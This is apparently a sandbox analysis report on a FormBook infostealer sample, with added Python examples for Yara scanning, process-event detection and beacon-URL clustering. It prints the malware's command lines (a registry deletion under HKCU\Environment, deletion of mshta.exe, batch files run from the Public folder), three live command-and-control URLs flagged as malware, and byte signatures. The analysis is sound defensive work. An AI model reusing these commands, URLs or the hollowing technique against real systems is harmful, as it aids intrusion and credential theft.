
Windows Analysis Report Form_TT_EUR57,890.exe

Overview

General Information

Sample Name: Form_TT_EUR57,890.exe
Analysis ID: 458655
MD5: 811ea41e60760a97b5f28973618728fe
SHA1: ec072cb8cb67785ca7fba45d36c6264b7eed65cd
SHA256: e6bd5f8475731bcca5f6b74327a68ee4b7fa5b0662521feff1d92424da149151
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara signature match

Process Tree

  • System is w10x64
  • Form_TT_EUR57,890.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\Form_TT_EUR57,890.exe' MD5: 811EA41E60760A97B5F28973618728FE)
    • logagent.exe (PID: 5784 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Fdhlajk.exe (PID: 6148 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • mshta.exe (PID: 5732 cmdline: C:\Windows\System32\mshta.exe MD5: 7083239CE743FDB68DFC933B7308E80A)
        • Fdhlajk.exe (PID: 6496 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • secinit.exe (PID: 6044 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
        • rundll32.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6324 cmdline: /c del 'C:\Windows\SysWOW64\mshta.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • autoconv.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 2408 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
    • cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2244 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6200 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\kjalhdF.url; Rule: Methodology_Contains_Shortcut_OtherURIhandlers; Description: Detects possible shortcut usage for .URL persistence; Author: @itsreallynick (Nick Carr); Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmp; Rule: Methodology_Contains_Shortcut_OtherURIhandlers; Description: Detects possible shortcut usage for .URL persistence; Author: @itsreallynick (Nick Carr); Strings:
  • 0xe98:$file: URL=
  • 0xe7c:$url_explicit: [InternetShortcut]
Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
(46 further memory-dump matches are not shown on this page)

Unpacked PEs

Source: 4.0.logagent.exe.10410000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 4.0.logagent.exe.10410000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 4.0.logagent.exe.10410000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
Source: 4.2.logagent.exe.10410000.5.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 4.2.logagent.exe.10410000.5.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 further unpacked-PE matches are not shown on this page)
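The Yara tables above (the .url persistence rule in the Dropped Files table and the Formbook rules in the memory-dump and unpacked-PE tables) list their evidence as offset:identifier pairs. The Python below is an added example, not code from the report or from the rule authors: a minimal byte-pattern scanner loaded with the JPCERT/CC Formbook strings and the Methodology_Contains_Shortcut_OtherURIhandlers strings exactly as printed above, run over constructed inputs (a .url file body and a zero-filled buffer with the sqlite3 pushes planted at the offsets the report lists for dump 0000001D; the real dump and the content of kjalhdF.url are not on the page). The match conditions (all three sqlite3 pushes; `[InternetShortcut]` at offset 0 plus a `URL=` key) are this example's simplification, not the published rules' conditions. It also decodes each `68 xx xx xx xx` string as the x86 `push imm32` it is, which is why those five-byte patterns are such stable signatures: the immediate is a constant the payload pushes, which the rule identifiers associate with sqlite3 API names.

```python
"""Minimal YARA-style scanner using the rule strings printed in this report."""
import re
import struct
from typing import Dict, List

# Strings copied from the report's Yara tables (hex as bytes, text as ASCII).
FORMBOOK_JPCERT = {
    "$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}
URL_SHORTCUT = {
    "$url_explicit": b"[InternetShortcut]",
    "$file": b"URL=",
}


def find_all(data: bytes, pattern: bytes) -> List[int]:
    """All offsets of pattern in data, overlapping ones included, ascending."""
    return [m.start() for m in re.finditer(b"(?=" + re.escape(pattern) + b")", data)]


def scan(data: bytes, strings: Dict[str, bytes]) -> Dict[str, List[int]]:
    """identifier -> offsets, only for identifiers that occur at least once."""
    hits: Dict[str, List[int]] = {}
    for ident, pattern in strings.items():
        offsets = find_all(data, pattern)
        if offsets:
            hits[ident] = offsets
    return hits


def report_lines(hits: Dict[str, List[int]]) -> List[str]:
    """Render hits the way the report's Strings column does: '0x166b9:$sqlite3step'."""
    return [f"0x{off:x}:{ident}" for ident, offs in hits.items() for off in offs]


def formbook_jpcert_matches(data: bytes) -> bool:
    # Assumed condition for this example: all three sqlite3 pushes must be present.
    return all(ident in scan(data, FORMBOOK_JPCERT) for ident in FORMBOOK_JPCERT)


def url_shortcut_matches(data: bytes) -> bool:
    # Assumed condition for this example: section header at offset 0 and a URL= key anywhere.
    hits = scan(data, URL_SHORTCUT)
    return hits.get("$url_explicit", [-1])[0] == 0 and "$file" in hits


def push_immediate(pattern: bytes) -> int:
    """Decode '68 imm32' (x86 PUSH imm32) to the little-endian constant it pushes."""
    if len(pattern) != 5 or pattern[0] != 0x68:
        raise ValueError("not a 5-byte push imm32")
    return struct.unpack("<I", pattern[1:])[0]


# Constructed inputs: the report's memory dump and the dropped .url are not on the page.
# The header plus CRLF puts 'URL=' at 0x14, the offset the Dropped Files table reports.
URL_FILE = b"[InternetShortcut]\r\nURL=file:///C:/Users/Public/Libraries/Fdhlajk/Fdhlajk.exe\r\n"

REPORTED_OFFSETS = [  # offsets the report lists for the JPCERT strings in dump 0000001D
    ("$sqlite3step", 0x166B9), ("$sqlite3step", 0x167CC),
    ("$sqlite3text", 0x166E8), ("$sqlite3text", 0x1680D),
    ("$sqlite3blob", 0x166FB), ("$sqlite3blob", 0x16823),
]


def build_fake_dump() -> bytes:
    """Zero-filled buffer with the JPCERT patterns planted at the reported offsets."""
    buf = bytearray(0x17000)
    for ident, off in REPORTED_OFFSETS:
        pattern = FORMBOOK_JPCERT[ident]
        buf[off:off + len(pattern)] = pattern
    return bytes(buf)


if __name__ == "__main__":
    dump = build_fake_dump()
    for line in report_lines(scan(dump, FORMBOOK_JPCERT)):
        print(line)
    for ident, pattern in FORMBOOK_JPCERT.items():
        print(f"{ident}: push 0x{push_immediate(pattern):08X}")
    print("formbook:", formbook_jpcert_matches(dump), "url persistence:", url_shortcut_matches(URL_FILE))
```

The yara-signator `$sequence_N` strings are added the same way (as `bytes.fromhex` entries), but note they are instruction sequences rather than constants and will shift with recompilation, whereas the pushed immediates survive it; when triaging your own dumps, prefer the constant-based strings and treat the sequence hits as corroboration.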

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, NewProcessName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, OriginalFileName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , ProcessId: 6148
Sigma detected: Suspicious Process Start Without DLL
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
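The four Sigma hits above and the process tree earlier in the report rest on a handful of process-creation fields (image path, command line, parent image). The Python below is an added example, not part of the Joe Sandbox report and not the Sigma project's rules: it re-implements those checks as simplified predicates and runs them over events constructed from this report's process tree. The folder list, the image paths assumed for cmd.exe and reg.exe (the tree shows only their names), the benign control event, and the two extra checks for the `del` of SysWOW64\mshta.exe and the `reg delete hkcu\Environment` call are this example's assumptions, not the published rule logic.

```python
"""Process-creation checks modelled on the Sigma hits and process tree in this report."""
import ntpath
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # field names follow the report's "Data:" lines

WINDOWS_DIR = "c:\\windows\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: a subset of the folders the published "Execution from Suspicious Folder" rule lists.
SUSPICIOUS_FOLDERS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\perflogs\\")


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def rundll32_without_params(ev: Event) -> bool:
    """rundll32.exe started with no DLL and no export; both rundll32 Sigma hits key on this."""
    if _name(ev["Image"]) != "rundll32.exe":
        return False
    cmd = ev["CommandLine"].strip().strip('"').lower()
    return cmd in (ev["Image"].lower(), "rundll32.exe", "rundll32")


def execution_from_suspicious_folder(ev: Event) -> bool:
    return ev["Image"].lower().startswith(SUSPICIOUS_FOLDERS)


def system_binary_with_foreign_parent(ev: Event) -> bool:
    """A System32/SysWOW64 image whose parent lives outside C:\\Windows: the hollowing-host
    shape of logagent.exe, secinit.exe and mshta.exe in this tree."""
    return (ev["Image"].lower().startswith(SYSTEM_DIRS)
            and not ev["ParentImage"].lower().startswith(WINDOWS_DIR))


def cmd_deletes_windows_binary(ev: Event) -> bool:
    """cmd.exe running 'del' against a path under C:\\Windows (the del of SysWOW64\\mshta.exe)."""
    cmd = f" {ev['CommandLine'].lower()} "
    return _name(ev["Image"]) == "cmd.exe" and " del " in cmd and WINDOWS_DIR in cmd


def reg_modifies_user_environment(ev: Event) -> bool:
    """reg.exe touching HKCU\\Environment (the 'reg delete hkcu\\Environment /v windir /f' step)."""
    return _name(ev["Image"]) == "reg.exe" and "hkcu\\environment" in ev["CommandLine"].lower()


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("rundll32_without_params", rundll32_without_params),
    ("execution_from_suspicious_folder", execution_from_suspicious_folder),
    ("system_binary_with_foreign_parent", system_binary_with_foreign_parent),
    ("cmd_deletes_windows_binary", cmd_deletes_windows_binary),
    ("reg_modifies_user_environment", reg_modifies_user_environment),
]


def evaluate(events: List[Event]) -> Dict[str, List[str]]:
    """'image:pid' -> names of the rules that fired, in RULES order."""
    return {f"{_name(ev['Image'])}:{ev['ProcessId']}": [name for name, rule in RULES if rule(ev)]
            for ev in events}


# Events constructed from the report's process tree. Image paths for cmd.exe and reg.exe are
# assumed (the tree shows only their names); the last event is a benign control, not from the report.
EVENTS: List[Event] = [
    {"ProcessId": "5784", "Image": "C:\\Windows\\System32\\logagent.exe",
     "CommandLine": "C:\\Windows\\System32\\logagent.exe",
     "ParentImage": "C:\\Users\\user\\Desktop\\Form_TT_EUR57,890.exe"},
    {"ProcessId": "6148", "Image": "C:\\Users\\Public\\Libraries\\Fdhlajk\\Fdhlajk.exe",
     "CommandLine": "'C:\\Users\\Public\\Libraries\\Fdhlajk\\Fdhlajk.exe' ",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": "6200", "Image": "C:\\Windows\\SysWOW64\\rundll32.exe",
     "CommandLine": "C:\\Windows\\SysWOW64\\rundll32.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": "6324", "Image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "CommandLine": "/c del 'C:\\Windows\\SysWOW64\\mshta.exe'",
     "ParentImage": "C:\\Windows\\SysWOW64\\rundll32.exe"},
    {"ProcessId": "6200", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg delete hkcu\\Environment /v windir /f",
     "ParentImage": "C:\\Windows\\system32\\cmd.exe"},
    {"ProcessId": "1234", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

if __name__ == "__main__":
    for key, fired in evaluate(EVENTS).items():
        print(f"{key:<22} {', '.join(fired) or '-'}")
```

The parent-image check is the one to watch in your own telemetry: the Sigma rules catch rundll32 and the Public folder, but logagent.exe and secinit.exe are legitimate Windows binaries with ordinary command lines, and only the fact that a Desktop executable spawned them betrays the hollowing.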

          Jbx Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8; Avira URL Cloud: Label: malware
Source: http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8; Avira URL Cloud: Label: malware
Source: http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8; Avira URL Cloud: Label: malware
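The three flagged URLs differ only in hostname and in the first query value; the path `/6mam/` and the trailing `PJEt=HRR0_XgHGBD8` are identical across all of them, which is consistent with one configuration cycling through a list of domains. The Python below is an added example, not part of the report: it parses such beacon URLs without the `+` and `/` mangling that `urllib.parse.parse_qs` would apply to the base64 value, confirms the variable parameter is a fixed-size base64 blob, and groups URLs by (path, trailing parameter) so that the three domains fall into one bucket. The URLs are copied from the report; the reading of the two fields as an opaque data blob and a campaign identifier is this example's assumption.

```python
"""Group sandbox-flagged beacon URLs by the structure they share rather than by domain."""
import base64
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# The three URLs Avira URL Cloud labelled as malware in this report.
FLAGGED_URLS = [
    "http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8",
    "http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8",
    "http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8",
]


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split key=value pairs verbatim; parse_qs would turn '+' into a space and break the base64."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_beacon(url: str) -> Dict[str, object]:
    """Decompose one URL into host, path and its two query parameters.
    Interpretation assumed here: a base64 data blob followed by a fixed identifier."""
    parts = urlsplit(url)
    params = split_query(parts.query)
    if len(params) != 2:
        raise ValueError(f"expected two query parameters, got {len(params)}: {url}")
    (data_key, data_value), (id_key, id_value) = params
    blob = base64.b64decode(data_value, validate=True)  # raises on anything but clean base64
    return {
        "host": parts.hostname,
        "path": parts.path.strip("/"),
        "data_key": data_key,
        "data_len": len(blob),
        "id_key": id_key,
        "id": id_value,
    }


def cluster(urls: List[str]) -> Dict[Tuple[str, str, str], List[str]]:
    """(path, identifier name, identifier value) -> hostnames that use it."""
    groups: Dict[Tuple[str, str, str], List[str]] = {}
    for url in urls:
        b = parse_beacon(url)
        groups.setdefault((b["path"], b["id_key"], b["id"]), []).append(b["host"])
    return groups


def same_campaign(urls: List[str]) -> bool:
    """True when every URL shares path, identifier and blob size, i.e. looks like one configuration."""
    beacons = [parse_beacon(u) for u in urls]
    return len({(b["path"], b["id_key"], b["id"], b["data_len"]) for b in beacons}) == 1


if __name__ == "__main__":
    for key, hosts in cluster(FLAGGED_URLS).items():
        print(key, "->", ", ".join(hosts))
    print("single campaign:", same_campaign(FLAGGED_URLS))
```

Two details matter for hunting on proxy logs: the sample sends `+`, `/` and `=` in the query unencoded, so a regex for `=[A-Za-z0-9+/]{60,}={0,2}&` catches the blob as logged, and the stable key is the path plus the trailing parameter, not any one domain.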
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe; ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: Form_TT_EUR57,890.exe; ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match; File source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.logagent.exe.10410000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.logagent.exe.10410000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.secinit.exe.10410000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.2.mshta.exe.10410000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.mshta.exe.10410000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.secinit.exe.10410000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
